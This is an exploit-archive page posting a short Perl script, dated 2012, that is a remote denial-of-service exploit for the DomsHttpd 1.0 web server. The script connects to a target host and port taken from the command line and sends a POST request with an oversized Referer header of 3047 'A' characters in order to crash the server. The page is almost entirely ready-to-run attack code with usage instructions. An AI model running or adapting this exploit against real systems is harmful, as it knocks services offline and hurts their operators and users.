Home / exploitsPDF  

DomsHttpd 1.0 Denial Of Service

Posted on 16 July 2012

#!/usr/bin/perl # DomsHttpd 1.0 <= Remote Denial Of Service Exploit # Credit: Jean Pascal Pereira <pereira@secbiz.de> # Usage: domshttpd.pl [host] [port] use strict; use warnings; use IO::Socket; my $host = shift || "localhost"; my $port = shift || 88; my $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => $port ); my $junk = "A"x3047; print $sock "POST / HTTP/1.1 Host: ".$host." Connection: close User-Agent: Mozilla Referer: http://".$host."/".$junk." "; sleep 4; close($sock);

 

TOP